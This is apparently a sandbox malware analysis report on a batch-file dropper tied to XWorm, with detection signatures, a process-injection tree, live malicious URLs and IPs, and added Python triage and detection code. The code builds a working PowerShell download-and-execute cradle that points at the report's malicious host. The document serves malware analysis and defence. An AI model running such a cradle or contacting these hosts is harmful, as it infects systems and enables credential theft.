Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
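The two encoded PowerShell launches listed above (`powershell -executionpolicy bypass -noprofile -windowstyle hidden -e <base64>`) are the pivot of this chain: the argument after `-e` is Base64 over the UTF-16LE bytes of the script. One caveat before trying to decode it from this page: the report renders these command lines case-folded to lowercase, and Base64 is case-sensitive (a UTF-16LE-encoded ASCII script would produce many uppercase `A` characters from its null bytes, and there are none here), so the string as printed will not decode back to the script. Recover the original casing from the process-creation event, the PCAP or the .bat itself. The Python below is an added triage example, not code from the report or the sample: it locates the `-EncodedCommand` argument under any of its abbreviations, decodes it, flags the execution-policy bypass, hidden window and profile suppression, extracts URLs from the decoded script, and checks for the mixed-case cmdlet spelling behind the "Net WebClient Casing Anomalies" Sigma hit. Both command lines it runs on are constructed: the first wraps a plain download cradle pointing at the a.mp4 URL from this report's URL table (it is not a decode of the report's string), the second uses a TEST-NET address and deliberately mangled casing. Argument splitting is naive (whitespace, quotes stripped), which is enough for the launches seen here.

```python
"""Decode and triage powershell.exe -EncodedCommand launches.

Added example for this report; the command lines it runs on are constructed.
"""
import base64
import binascii
import re

URL_RE = re.compile(r'https?://[^\s\'"()<>]+', re.I)
# Canonical spellings; a hit that is neither canonical, all-lower nor all-upper is
# the mixed-case evasion the "Net WebClient Casing Anomalies" rule looks for.
CANONICAL = {"net.webclient": "Net.WebClient", "new-object": "New-Object"}
CASING_RE = re.compile(r"net\.webclient|new-object", re.I)


def _switch(token):
    """Lower-cased switch name if token looks like a powershell.exe switch, else None."""
    return token[1:].lower() if token.startswith("-") and len(token) > 1 else None


def is_encoded_switch(token):        # -e, -ec, -en, -enc, ... -encodedcommand
    s = _switch(token)
    return s is not None and (s in ("e", "ec") or (len(s) >= 2 and "encodedcommand".startswith(s)))


def is_exec_policy_switch(token):    # -ep, -ex, -exec, ... -executionpolicy
    s = _switch(token)
    return s is not None and (s == "ep" or (len(s) >= 2 and "executionpolicy".startswith(s)))


def is_window_style_switch(token):   # -w, -wi, ... -windowstyle
    s = _switch(token)
    return s is not None and (s == "w" or (len(s) >= 2 and "windowstyle".startswith(s)))


def is_noprofile_switch(token):      # -nop, -nopr, ... -noprofile
    s = _switch(token)
    return s is not None and len(s) >= 3 and "noprofile".startswith(s)


def encode_command(script):
    """What powershell.exe expects after -EncodedCommand: Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_command; returns (script, None) or (None, reason)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le"), None
    except (binascii.Error, UnicodeDecodeError, ValueError) as exc:
        return None, f"{type(exc).__name__}: {exc}"


def triage(cmdline):
    tokens = [t.strip("\"'") for t in cmdline.split()]   # naive split; no quoted-argument handling
    result = {"decoded": None, "decode_error": None, "flags": [], "urls": []}
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if is_exec_policy_switch(tok) and nxt.lower() in ("bypass", "unrestricted"):
            result["flags"].append("execution_policy_bypass")
        elif is_window_style_switch(tok) and nxt.lower() == "hidden":
            result["flags"].append("hidden_window")
        elif is_noprofile_switch(tok):
            result["flags"].append("no_profile")
        elif is_encoded_switch(tok) and nxt:
            result["decoded"], result["decode_error"] = decode_encoded_command(nxt)
    script = result["decoded"] or ""
    low = script.lower()
    if "downloadstring" in low or "downloadfile" in low:
        result["flags"].append("webclient_download")
    if re.search(r"\biex\b|invoke-expression", low):
        result["flags"].append("invoke_expression")
    result["urls"] = URL_RE.findall(script)
    for m in CASING_RE.finditer(script):
        seen = m.group(0)
        canon = CANONICAL.get(seen.lower())
        if canon is not None and seen not in (canon, seen.lower(), seen.upper()):
            result["flags"].append("casing_anomaly")
            break
    return result


# Constructed samples. SCRIPT_1 is a plain download cradle using the a.mp4 URL this
# report lists; it is NOT a decode of the report's (case-folded) string.
SCRIPT_1 = "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')"
CMDLINE_1 = "powershell -executionpolicy bypass -noprofile -windowstyle hidden -e " + encode_command(SCRIPT_1)
# SCRIPT_2 uses a TEST-NET address and the mixed-case spelling the Sigma rule targets.
SCRIPT_2 = "$c=nEw-oBjEcT nEt.wEbClIeNt;IEX $c.DownloadString('http://198.51.100.7/x.mp4')"
CMDLINE_2 = "powershell -nop -w hidden -ep bypass -enc " + encode_command(SCRIPT_2)

if __name__ == "__main__":
    for cmd in (CMDLINE_1, CMDLINE_2):
        print(triage(cmd))
    # Case-folding the Base64, as the report display does, destroys the payload:
    print(decode_encoded_command(encode_command(SCRIPT_1).lower()))
```

The last line of the `__main__` block reproduces the caveat from the lead-in: lowercasing the Base64 either fails UTF-16LE decoding or yields garbage, never the original script, so an analyst who copies the string from this page and gets nothing sensible should not conclude the payload is corrupt.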

Stealing of Sensitive Information

Source: Yara match; File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 7384, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 7384, type: MEMORYSTR
MITRE ATT&CK matrix, one line per tactic. A number in brackets is the report's match count for that technique; techniques without a number had no matches and are listed only because the matrix shows them.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [11]; Command and Scripting Interpreter [1]; Native API [1]; PowerShell [4]; Launchd; Scheduled Task; Systemd Timers
Persistence: Scripting [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [311]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [131]; Process Injection [311]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [11]; Software Packing [2]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; System Information Discovery [13]; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [11]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel [12]; Non-Standard Port [1]; Ingress Tool Transfer [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1648674; Sample: 92.255.85.2.bat; Start date: 26/03/2025; Architecture: WINDOWS; Score: 100. The interactive graph is given here as a process tree; the numbers after a process name are the graph's per-process counters.

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
Sample-level DNS: pki-goog.l.google.com; c.pki.goog

cmd.exe (1), started
    signatures: Malicious encrypted Powershell command line found; Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
    +-- conhost.exe, started
    +-- powershell.exe (14, 22), started
        network: 92.255.85.2, ports 4372, 49717, 49722 (SOVTEL-ASRU, Russian Federation)
        dropped: C:\Users\user\AppData\...\strztqek.cmdline (Unicode); C:\Users\user\AppData\Local\...\strztqek.0.cs (C++)
        signatures: Writes to foreign memory regions; Compiles code for process injection (via .Net compiler); Injects a PE file into a foreign processes
        +-- MSBuild.exe (2), started
            signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        +-- csc.exe (3), started
            dropped: C:\Users\user\AppData\Local\...\strztqek.dll (PE32)
            +-- cvtres.exe (1), started
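The process tree above (cmd.exe to powershell.exe, which starts both csc.exe with its cvtres.exe child and an MSBuild.exe) is the compile-and-inject pattern behind the "Dot net compiler compiles file from suspicious location", "Compiles code for process injection (via .Net compiler)" and "Injects a PE file into a foreign processes" hits. The `.cmdline` response file, the `.0.cs` source and the `.dll` output in `%TEMP%\strztqek\` are what PowerShell's in-memory C# compilation (Add-Type / CodeDom) leaves on disk, and an MSBuild.exe started by a script host without any project file has no build to run; it exists only to receive the injected payload. The Python below is an added detection example, not the sandbox's logic or the sample's code. It runs over constructed process-creation records shaped like Sysmon event 1 (image path, command line, PID, parent PID), correlates each csc.exe and MSBuild.exe with the nearest script-host ancestor, and raises a "chain" only when the same script host both compiled in a user-writable directory and spawned a project-less injection target. PIDs 7872 and 7384 and the Temp paths come from this report; the other PIDs, the cmd.exe and csc.exe command lines, and the benign Visual Studio control chain are constructed and labelled as such in the code.

```python
"""Detect the compile-and-inject chain (script host -> csc.exe in a user-writable
directory, same script host -> project-less MSBuild.exe) in process-creation records.

Added example for this report; the input records are constructed, not sandbox output.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# .NET binaries commonly started suspended and hollowed to host an injected payload
INJECTION_TARGETS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "aspnet_compiler.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\programdata\\|\\windows\\temp\\", re.I)
PROJECT_FILE = re.compile(r"\.(?:proj|csproj|vbproj|sln|targets)\b", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def script_host_ancestor(by_pid, pid):
    """Walk parent links from pid upward; return the first script-host record, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        rec = by_pid[pid]
        if image_name(rec["image"]) in SCRIPT_HOSTS:
            return rec
        pid = rec["ppid"]
    return None


def analyze_process_events(events):
    """Return (alerts, chains). alerts: (rule, pid, script_host_pid) tuples.
    chains: script-host PIDs that both compiled in a user-writable directory and
    spawned a project-less injection target, i.e. the compile-and-inject pattern."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        name = image_name(ev["image"])
        host = script_host_ancestor(by_pid, ev["ppid"])
        host_pid = host["pid"] if host else None
        if name in DOTNET_COMPILERS and USER_WRITABLE.search(ev["cmdline"]):
            alerts.append(("compile_from_user_writable", ev["pid"], host_pid))
        if name in INJECTION_TARGETS and host and not PROJECT_FILE.search(ev["cmdline"]):
            alerts.append(("lolbin_spawned_by_script_host", ev["pid"], host_pid))
    rules_by_host = {}
    for rule, _pid, host_pid in alerts:
        if host_pid is not None:
            rules_by_host.setdefault(host_pid, set()).add(rule)
    needed = {"compile_from_user_writable", "lolbin_spawned_by_script_host"}
    chains = [h for h, rules in rules_by_host.items() if needed <= rules]
    return alerts, chains


# Constructed records. PIDs 7872 (powershell.exe) and 7384 (MSBuild.exe) and the
# Temp paths are from the report; everything else here is made up for the example.
SAMPLE_EVENTS = [
    {"pid": 6900, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\user\Desktop\92.255.85.2.bat"'},
    {"pid": 7872, "ppid": 6900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -executionpolicy bypass -noprofile -windowstyle hidden -e <base64 omitted>"},
    {"pid": 7300, "ppid": 7872, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"'},
    {"pid": 7310, "ppid": 7300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp"'},
    {"pid": 7384, "ppid": 7872, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'},
    # benign control: a developer build with no script host anywhere in the ancestry
    {"pid": 8100, "ppid": 1, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 8120, "ppid": 8100, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"pid": 8130, "ppid": 8120, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /noconfig @C:\src\app\obj\Debug\app.rsp"},
]

if __name__ == "__main__":
    alerts, chains = analyze_process_events(SAMPLE_EVENTS)
    for a in alerts:
        print("alert:", a)
    print("compile-and-inject chains under script host PIDs:", chains)
```

The per-event rules alone are noisy (developers do run csc.exe from odd places, and MSBuild.exe legitimately appears under cmd.exe in build scripts); the value is in the correlation step, which only fires when one script host does both halves, as powershell.exe PID 7872 does in this report. The benign devenv.exe chain is flagged by neither rule.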

Antivirus detection for the submitted file (Source; Detection; Scanner; Label):
92.255.85.2.bat; 18%; Virustotal
92.255.85.2.bat; 17%; ReversingLabs; Script-BAT.Backdoor.Boxter

Antivirus detection for dropped files (Source; Detection; Scanner; Label):
C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll; 100%; Avira; TR/Dropper.Gen7

(Two further scan tables report no antivirus matches.)

Antivirus detection for URLs (Source; Detection; Scanner; Label):
http://92.255.85.2/a.mp4; 100%; Avira URL Cloud; malware
http://92.255.85.2/k.exe; 100%; Avira URL Cloud; phishing
http://92.255.85.2; 0%; Avira URL Cloud; safe
http://92.255.85.2/Fox.exe; 100%; Avira URL Cloud; phishing


Domains contacted (Name; IP; Active; Malicious; Reputation):
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; 208.89.73.19; active: true; malicious: false; reputation: high
pki-goog.l.google.com; 142.250.80.35; active: true; malicious: false; reputation: high
c.pki.goog; IP unknown; active: unknown; malicious: false; reputation: high
URLs contacted (Name; Malicious; Antivirus detection; Reputation):
http://92.255.85.2/a.mp4; malicious: true; Avira URL Cloud: malware; reputation: unknown
92.255.85.2; malicious: false; reputation: high
URLs found in process memory (Name; Source; Malicious; Antivirus detection; Reputation):
http://nuget.org/NuGet.exe; powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://www.apache.org/licenses/LICENSE-2.0; powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://92.255.85.2; powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891A72D000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
http://pesterbdd.com/images/Pester.png; powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://92.255.85.2/Fox.exe; powershell.exe, 00000003.00000002.1345688716.000002891A9FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: phishing; reputation: unknown
http://www.apache.org/licenses/LICENSE-2.0.html; powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://go.micro; powershell.exe, 00000003.00000002.1345688716.000002891A2D7000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://contoso.com/; powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://nuget.org/nuget.exe; powershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://contoso.com/License; powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://contoso.com/Icon; powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://oneget.orgX; powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://aka.ms/pscore68; powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://github.com/Pester/Pester; powershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
https://oneget.org; powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://92.255.85.2/k.exe; powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: phishing; reputation: unknown
IPs contacted (IP; Domain; Country; ASN; ASN Name; Malicious):
92.255.85.2; domain unknown; Russian Federation; 42097; SOVTEL-ASRU; malicious: true
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1648674
                                                Start date and time:2025-03-26 04:15:18 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:92.255.85.2.bat
                                                Detection:MAL
                                                Classification:mal100.bank.troj.expl.evad.winBAT@10/9@1/1
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 93%
                                                • Number of executed functions: 13
                                                • Number of non-executed functions: 1
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.204.23.20, 23.203.176.221, 208.89.73.19, 20.109.210.53, 52.165.164.15, 20.3.187.198, 204.79.197.222
                                                • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Timeline (Time; Type; Description):
23:16:28; API Interceptor; 33x Sleep call for process: powershell.exe modified
23:16:35; API Interceptor; 9415580x Sleep call for process: MSBuild.exe modified
IP context (Match; Associated Sample Name / URL; Detection; Threat Name; Context):
92.255.85.2; 92.255.85.2.ps1; malicious; Unknown; context: 92.255.85.2/cmd.bat
92.255.85.2; cmd.bat; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; 92.255.85.2.bat; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; https://energy.economictimes.indiatimes.com/redirect.php?url=///itemsidguest.com; malicious; Unknown; context: 92.255.85.2/cmd.bat
92.255.85.2; 92.255.85_1.2.bat; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; 92.255.85.2.ps1; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; v4mNsTzbsL.exe; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; 92.255.85.2.ps1; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; 92.255.85_3.2.ps1; malicious; XWorm; context: 92.255.85.2/pq.exe
92.255.85.2; cmd.bat; malicious; XWorm; context: 92.255.85.2/pq.exe
Domain context (Match; Associated Sample Name / URL; Detection; Threat Name; Context):
pki-goog.l.google.com; file.exe; malicious; CryptOne, LummaC Stealer, Socks5Systemz; context: 142.251.35.163
pki-goog.l.google.com; file.exe; malicious; LummaC Stealer; context: 142.250.80.67
pki-goog.l.google.com; EFT Remittance_(Bobd)CQDM.htm; malicious; HTMLPhisher, Invisible JS, Tycoon2FA; context: 142.250.80.67
                                                https://protect.checkpoint.com/v2/r01/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR*~*QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJz0ZOA1YpCSoGOfZu2gE3yRpN701JyRpOm4ZZyRp4q0YpC41S1h5KD47KphMiO0J/ARo394ZuDi6WW41uA0ZCGZsV/hKq4hn5DVqi1SpSG0Iiq0YiNiZC33pyAQYOLfD5DVoOH4EWH45yy38iYhrWx0YiVg5yOT0VyRpOmZ1K2gpqsW5R/g5c81YGRQYOLV8umhLS2X6OG02WJ48S4XrSZhspDQYOHj0O/ZZO4YYpEY0i64ZCT0KSvgIWoXKR8hZi9SJ6HZ1WSYoWD07KS1LZBgs09XESu4KOBh0WJ1r02gq3CTL/54pS*~*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*~*08WYXMSmg1q6Z1l5Z00*~*Y1WChJ0t0Ii6hES8XImMiM0QYryZ4EWO1KqsSZ0K00WfX5WS11C636i63Ep80qSYjo4mWE4111p6Y5tyRp4Y45c43py9fEqOV5351KGy1Km/R0S40H5DWqZC0JyGW1iAYIqCgMG7gZS*~*003CX1yMV0GDfsZyRp38f54wZJuS00O7R5cE1ol6jJ6XhMpD1p0vj0uXi0uZf6JyRp4GRZ6IgpC/0puyW0itV0JyR5VyR5V=dJ9a86J/5GGJ6/HFH867JHa95G57Ja897H65*~*G65b9/b7c9/a8J6JI56758*~*GFFJI?h=6&fru;n=6&fru;ithx=6___.YzJ1OnNlcXVhbGNvcnA6YzpvOjVjN2U0MGNlMGRhNDNkZDEwYjk3ODU0ZTRhMGNmYTFjOjc6MDQyMTpiZDMwNmQ3NDgyNWUwNmM1NzVmMTk0YTFiN2ZjZDQ3NWZjMzIzMTMzNjg2ZmY0ZTMyY2VmMDdmYWRhZDI0MTJjOmg6VDpUGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                • 172.217.16.195
pki-goog.l.google.com; qoutation.js; malicious; XWorm; context: 142.250.64.99
pki-goog.l.google.com; 2hTQLYwtNS.exe; malicious; Unknown; context: 142.251.41.3
pki-goog.l.google.com; Acgsys#receipt0191.html; malicious; HTMLPhisher, Invisible JS, Tycoon2FA; context: 142.251.41.3
pki-goog.l.google.com; mzJ9X7kc28.exe; malicious; LummaC Stealer; context: 142.251.40.195
pki-goog.l.google.com; 2xHGY40ElK.exe; malicious; Iris Stealer; context: 142.251.40.227
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; https://www.canva.com/design/DAGip6DbGGY/U0pN74ofNkqBSFMzXXCnAw/view?utm_content=DAGip6DbGGY&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h777bcb50d3; malicious; Invisible JS, Tycoon2FA; context: 208.89.73.25
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; ggap4lbV49.exe; malicious; Unknown; context: 208.89.73.19
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; PURCHASE ORDER 5172025.xla.xlsx; malicious; Unknown; context: 208.89.73.17
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; 4wAvgisuKU.exe; malicious; PureCrypter, AsyncRAT; context: 208.89.73.19
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; SecuriteInfo.com.FileRepMalware.14590.30096.exe; malicious; Unknown; context: 84.201.210.39
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; SecuriteInfo.com.FileRepMalware.14590.30096.exe; malicious; Unknown; context: 217.20.57.18
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; 702cb6e..eml; malicious; HTMLPhisher; context: 208.89.73.19
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; JpPY0mRA9f.exe; malicious; Vidar; context: 208.89.73.19
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; SolaraFixNew.bat; malicious; SheetRat; context: 208.89.73.17
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; 1208_37832604.doc; malicious; Unknown; context: 208.89.73.17
